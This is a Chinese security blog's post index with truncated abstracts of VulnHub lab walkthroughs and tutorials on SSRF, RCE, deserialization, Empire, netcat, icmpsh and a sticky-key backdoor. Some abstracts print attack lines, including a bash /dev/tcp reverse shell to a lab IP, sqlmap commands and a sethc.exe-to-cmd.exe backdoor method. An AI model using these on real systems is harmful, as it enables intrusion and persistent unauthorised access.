摘要: Hackademic-RTB1 一、nmap 扫全端口会爆炸,暂时使用默认先扫描出两个 二、web渗透 随便看看 简单目录爆破 /Hackademic_RTB1/ 根据界面提示,我们可以来到这个目录 源码处发现框架 再次目录爆破 wscan扫描 WordPress 1.5.1 searchsploi 阅读全文
posted @ 2024-04-10 12:24 gcc_com 阅读(62) 评论(0) 推荐(0)
摘要: daybreak简单使用 B/S架构 启动or关闭daybreak # 启动 方式一: chmod + x nserver_linux_amd64 nserver_linux_amd64 server - tls - p 23333 & 方式二: ./install.sh #关闭 systemctl 阅读全文
posted @ 2024-04-05 09:37 gcc_com 阅读(172) 评论(0) 推荐(0)
摘要: Web渗透_SSRF漏洞 一、介绍SSRF漏洞 SSRF (Server-Side Request Forgery,服务器端请求伪造) 是一种由攻击者构造请求,由服务端发起请求的安全漏洞。一般情况下,SSRF攻击的目标是外网无法访问的内部系统(正因为请求是由服务端发起的,所以服务端能请求到与自身相连 阅读全文
posted @ 2024-04-04 20:45 gcc_com 阅读(203) 评论(0) 推荐(1)
摘要: Connect-the-dots 一、nmap cat ports | grep open | awk -F '/' '{print$1}' | paste -sd ',' > nmap_open_port_total.txt 二、ftp渗透 没啥 三、web渗透 随便看看 图片隐写 目录爆破 没错 阅读全文
posted @ 2024-04-02 11:56 gcc_com 阅读(63) 评论(0) 推荐(0)
摘要: Empire使用 ①Empire简单介绍 Empire是一个纯粹的PowerShell开发后代理,基于加密安全的通信和灵活的体系结构构建。Empire实现了运行PowerShell代理的功能,而无需powershell.exe,从关键记录器到Mimikatz的可快速部署的利用后模块,以及适应性强的通 阅读全文
posted @ 2024-03-29 12:47 gcc_com 阅读(220) 评论(0) 推荐(0)
摘要: billub0x 一、nmap 二、web渗透 随便看看 万能密码 没戏 bp抓包导成文件 sqlmap sqlmap -r sql.txt --batch --dbs --random-agent -p "un" sqlmap -r sql.txt --batch --dbs --random-a 阅读全文
posted @ 2024-03-24 09:53 gcc_com 阅读(112) 评论(0) 推荐(0)
摘要: Moonsec_Projet_7 1、基础介绍 1.1 网络拓扑图 主机 账号 密码 网卡 IP Windows Server 2016 administrator !@#QWE123 vmnet17(web) | vmnet18 192.168.0.144(www.moonlab.com) | 1 阅读全文
posted @ 2024-03-22 10:52 gcc_com 阅读(191) 评论(0) 推荐(0)
摘要: IPC$管道通信 IPC$(Internet Process Connection)是共享”命名管道”的资源,它是为了让进程间通信而开放的命名管道,可以通过验证用户名和密码获得相应的权限,在远程管理计算机和查看计算机的共享资源时使用。利用IPC$,连接者甚至可以与目标主机建立一个连接,利用这个连接, 阅读全文
posted @ 2024-03-19 17:11 gcc_com 阅读(145) 评论(0) 推荐(0)
摘要: Fowsniff 1、nmap 2、web渗透 简单浏览 目录爆破 发现可以文件,下载分析 隐写分析 无果,重新浏览80端口 官网浏览 pastebin.com/378rLnGi信息泄露 制作字典 发现爆破均无果 hash识别 john暴力破解hash 发现爆破一次之后,对方会有限制,一段时间后又可 阅读全文
posted @ 2024-03-18 19:18 gcc_com 阅读(35) 评论(0) 推荐(0)
摘要: NC(netcat)基本操作 前提: 凭空是无法打开端口,那么我们就可以使用nc这个工具开启我们想要开放的端口。 想开什么端口就可以开什么端口让别人进入。 nc的启用 Windows端nc使用方法 Kali端nc使用方法 基本使用方法一、监听/聊天工具 方法:kali上使用nc去连接Windows7 阅读全文
posted @ 2024-03-17 19:14 gcc_com 阅读(273) 评论(0) 推荐(1)
摘要: Windows粘滞键后门 原理:把sethc.exe粘滞键功能替换成cmd.exe的shell窗口,连续按5次shift键即可呼出cmd。 ①粘滞键替换成cmd的基本应用 1、找到粘滞键应用所在的位置。 在C:/Windows/System32这个目录(系统进程的目录)下可找到粘滞键sethc这个应 阅读全文
posted @ 2024-03-13 22:03 gcc_com 阅读(951) 评论(0) 推荐(0)
摘要: 小工具icmpsh的基本操作 基础介绍 原理:通过icmp这个协议进行反弹一个shell 前提条件:Kali(192.168.126.134)与Windows7(192.168.126.129)靶机需要在同一个网段(内网)当中,可以进行通信 操作流程 1、github上下载资源,复制进Kali,进行 阅读全文
posted @ 2024-03-10 20:19 gcc_com 阅读(162) 评论(0) 推荐(0)
摘要: My_file_server_1(VulnHub) 1、nmap 2、目录爆破 gobuster dirb dirsearch 3、文件服务器渗透 PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 3.0.2 | ftp-syst: | STAT: 阅读全文
posted @ 2024-03-06 20:46 gcc_com 阅读(36) 评论(0) 推荐(0)
摘要: RCE命令执行&代码执行漏洞 RCE命令执行漏洞 RCE漏洞简介 RCE(remote code/command execute) 远程代码/命令执行漏洞 RCE漏洞是两个漏洞: 代码执行漏洞 # 针对后端语言! 命令执行漏洞 # 针对系统! 如何产生 在 Web应用中有时候程序员为了考虑灵活性、简 阅读全文
posted @ 2024-02-27 17:41 gcc_com 阅读(1039) 评论(0) 推荐(1)
摘要: Misdirection(VulnHub) nmap扫描 目录爆破 80小探索 searchsploit 无果 8080端口渗透 反弹shell bash -i >& /dev/tcp/192.168.2.228/11111 0>&1 python -c 'import socket,subproc 阅读全文
posted @ 2024-02-25 20:40 gcc_com 阅读(21) 评论(0) 推荐(0)
摘要: Prime 1、nmap 2、web渗透 随便看看 首页隐写查看 目录爆破 gobuster feroxbuster dirsearch dirb 只有dirb扫出来 whatweb searchsploit WordPress 5.2.2 WordPress利用点基本上都是插件或者主题,这里暂时都 阅读全文
posted @ 2024-02-14 16:27 gcc_com 阅读(43) 评论(0) 推荐(0)
摘要: 42种常见网站漏洞,让你水得快速,水得专业 转载:零漏安全 2024-01-10 12:29 发表于河南 免责声明:由于传播、利用本公众号"零漏安全"所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,公众号"零漏安全"及作者不为此承担任何责任,一旦造成后果请自行承担!如有侵权烦请 阅读全文
posted @ 2024-02-09 21:54 gcc_com 阅读(487) 评论(0) 推荐(0)
摘要: 反序列化漏洞 什么是序列化、反序列化 例子引入 序列化是将对象的状态信息转换为可以存储或传输的形式的过程。在序列化期间,对象将当前状态写入到临时或持久性存储区。以后,可以通过从存储区中读取或反序列化对象状态,重新创建该对象。 简单的来讲:(含例子easy.php) 序列化:把对象转换为字节序列的过程 阅读全文
posted @ 2024-02-06 09:28 gcc_com 阅读(137) 评论(0) 推荐(0)
摘要: DC1(VulnHub) 1 2 3 4、flag1提示 flag1提示:Every good CMS needs a config file - and so do you. 5、flag2提示 flag2提示:Brute force and dictionary attacks aren't t 阅读全文
posted @ 2024-02-05 00:16 gcc_com 阅读(31) 评论(0) 推荐(0)
摘要: hackable II(VulnHub) 1 2 3 4 5 6 7 8 9 10 11 12 13 14 阅读全文
posted @ 2024-02-04 00:05 gcc_com 阅读(25) 评论(0) 推荐(0)